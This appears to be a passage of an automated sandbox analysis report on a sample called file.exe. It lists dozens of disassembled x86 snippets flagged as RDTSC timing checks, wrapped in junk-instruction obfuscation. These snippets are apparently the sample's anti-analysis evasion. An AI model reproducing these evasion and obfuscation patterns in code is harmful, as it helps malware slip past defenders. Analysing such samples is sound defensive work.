                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792661 second address: 7926F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F701CDA8A68h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 add esi, 5A698D30h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F701CDA8A68h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007F701CDA8A79h 0x0000004a push 00000000h 0x0000004c mov esi, dword ptr [ebp+122D2ABFh] 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F701CDA8A72h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F701CDA8A6Ah 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790D08 second address: 790D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7926F5 second address: 79270F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793102 second address: 793162 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx esi, ax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F701CDC8378h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 5CE869B5h 0x0000002e push eax 0x0000002f mov esi, edx 0x00000031 pop edi 0x00000032 mov di, ax 0x00000035 push 00000000h 0x00000037 jmp 00007F701CDC8386h 0x0000003c push eax 0x0000003d pushad 0x0000003e jl 00007F701CDC837Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792E68 second address: 792E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797D9A second address: 797D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792E6C second address: 792E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 797D9E second address: 797DB1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F701CDC8376h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B5FD second address: 79B616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A74h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79A6F0 second address: 79A6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B616 second address: 79B627 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F701CDA8A66h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B627 second address: 79B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F701CDC8378h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov ebx, 1AD062A6h 0x00000026 push 00000000h 0x00000028 call 00007F701CDC8385h 0x0000002d call 00007F701CDC8387h 0x00000032 mov ebx, 5D140B4Dh 0x00000037 pop ebx 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b jmp 00007F701CDC8384h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C53A second address: 79C544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F701CDA8A66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B7C9 second address: 79B7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C544 second address: 79C548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B7CD second address: 79B7D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B7D7 second address: 79B7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E528 second address: 79E532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F701CDC8376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E532 second address: 79E536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E536 second address: 79E57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F701CDC8378h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push edx 0x00000026 jnl 00007F701CDC837Ch 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 sub di, C51Ah 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E57B second address: 79E57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E57F second address: 79E585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79D7C8 second address: 79D7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79D7CE second address: 79D7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79E752 second address: 79E756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79F74E second address: 79F753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1277 second address: 7A127B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A127B second address: 7A128D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A128D second address: 7A1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A05A3 second address: 7A05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A05B9 second address: 7A05C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A23C4 second address: 7A2445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jno 00007F701CDC8376h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F701CDC8378h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2A17h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F701CDC8378h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov edi, dword ptr [ebp+122D26E4h] 0x00000057 jnp 00007F701CDC8381h 0x0000005d push 00000000h 0x0000005f stc 0x00000060 push eax 0x00000061 push ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A2445 second address: 7A2449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A146C second address: 7A147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A147E second address: 7A1490 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F701CDA8A6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1490 second address: 7A14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F701CDC837Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A52EB second address: 7A52EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A52EF second address: 7A52F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A52F8 second address: 7A530A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F701CDA8A66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A530A second address: 7A530E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A530E second address: 7A5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F701CDA8A70h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F701CDA8A68h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov bh, AEh 0x0000002d push 00000000h 0x0000002f add ebx, dword ptr [ebp+122D2B2Fh] 0x00000035 xchg eax, esi 0x00000036 jc 00007F701CDA8A6Ah 0x0000003c push esi 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop esi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F701CDA8A74h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A74B6 second address: 7A74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A74BC second address: 7A7533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F701CDA8A76h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F701CDA8A68h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F701CDA8A68h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 xchg eax, esi 0x00000047 jmp 00007F701CDA8A6Ch 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 jg 00007F701CDA8A66h 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7533 second address: 7A7544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A25AD second address: 7A25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A4486 second address: 7A44A4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8384h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A551C second address: 7A5527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A25B1 second address: 7A25B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A44A4 second address: 7A44A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A663D second address: 7A6660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F701CDC837Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A672E second address: 7A6745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A6745 second address: 7A677C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F701CDC8388h 0x00000012 jne 00007F701CDC8376h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A677C second address: 7A6799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7622 second address: 7A7626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7626 second address: 7A7638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7638 second address: 7A7659 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F701CDC8387h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A85EF second address: 7A85F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B041B second address: 7B041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B4D0B second address: 7B4D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F701CDA8A84h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDA8A73h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B4D50 second address: 7B4D78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC837Ch 0x00000008 jns 00007F701CDC8376h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDC8384h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74195F second address: 74196B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F701CDA8A66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74196B second address: 74196F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74196F second address: 741992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F701CDA8A70h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jl 00007F701CDA8A66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAE8D second address: 7BAEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8387h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDC8384h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAEC1 second address: 7BAEC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAEC7 second address: 7BAF05 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8378h 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F701CDC837Dh 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F701CDC8389h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB6B6 second address: 7BB6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB6BA second address: 7BB6BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB6BE second address: 7BB6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F701CDA8A78h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BB6E2 second address: 7BB6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBB2F second address: 7BBB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F701CDA8A66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDA8A77h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBCF1 second address: 7BBCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBCF7 second address: 7BBCFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBE6A second address: 7BBE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8382h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBE80 second address: 7BBEB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A6Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F701CDA8A6Fh 0x00000017 pop eax 0x00000018 jp 00007F701CDA8A6Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBEB3 second address: 7BBED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F701CDC8376h 0x0000000a jmp 00007F701CDC8387h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBED4 second address: 7BBEDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBEDA second address: 7BBEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F701CDC8376h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BBEE8 second address: 7BBEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BC03B second address: 7BC03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BC03F second address: 7BC057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A72h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BC057 second address: 7BC05D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BC05D second address: 7BC082 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F701CDA8A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDA8A77h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BFDA0 second address: 7BFDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
